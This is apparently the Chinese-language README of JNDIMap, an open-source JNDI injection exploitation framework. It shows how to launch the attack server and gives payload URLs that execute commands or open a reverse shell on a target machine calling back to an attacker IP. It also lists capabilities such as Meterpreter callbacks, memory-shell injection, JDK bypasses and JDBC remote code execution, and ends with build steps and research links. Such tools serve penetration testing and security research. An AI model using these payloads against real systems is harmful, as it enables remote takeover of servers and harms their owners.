JNDIMap 是一个强大的 JNDI 注入利用框架, 支持 RMI、LDAP 和 LDAPS 协议, 包含多种高版本 JDK 绕过方式
简体中文 | English
在 Release 页面下载 JNDIMap, 运行时传入 -i
参数指定外部 IP
java -jar JNDIMap-version.jar -i 10.0.0.1
在目标机器上执行命令或反弹 Shell
rmi://10.0.0.1:1099/Basic/Command/open -a Calculator
ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337
- DNSLog
- 命令执行
- 反弹 Shell
- Meterpreter 上线
- 加载自定义 Java 字节码
- 内存马注入 (基于 MemShellParty)
- 高版本 JDK 绕过
- BeanFactory 绕过 (Tomcat/Groovy/XStream, etc.)
- JDBC RCE (MySQL/PostgreSQL/H2/Derby)
- Tomcat Blind XXE
- LDAP 反序列化 (包含常用 Gadget)
- Nashorn JS 自定义 Payload
完整文档: USAGE.md
- Usage
- URL 格式
- Basic 功能
- 内存马注入
- BeanFactory 绕过
- JDBC RCE
- Tomcat Blind XXE
- LDAP Deserialization
- Script
- 高级技巧
Releases 的版本可能存在滞后, 推荐在使用时拉取源码自行编译 (基于 JDK 8)
git clone https://github.com/X1r0z/JNDIMap && cd JNDIMap
mvn package -Dmaven.test.skip=true
https://tttang.com/archive/1405/
https://paper.seebug.org/1832/
http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce
https://y4tacker.github.io/2023/03/20/year/2023/3/FastJson 与原生反序列化/
https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson 与原生反序列化-二/
https://www.yulegeyu.com/2022/11/12/Java 安全攻防之老版本 Fastjson 的一些不出网利用/
https://www.leavesongs.com/PENETRATION/use-tls-proxy-to-exploit-ldaps.html
https://exp10it.io/2025/03/h2-rce-in-jre-17/
https://forum.butian.net/share/4414
https://yzddmr6.com/posts/swinglazyvalue-in-webshell/
https://mogwailabs.de/en/blog/2024/12/jndi-mind-tricks/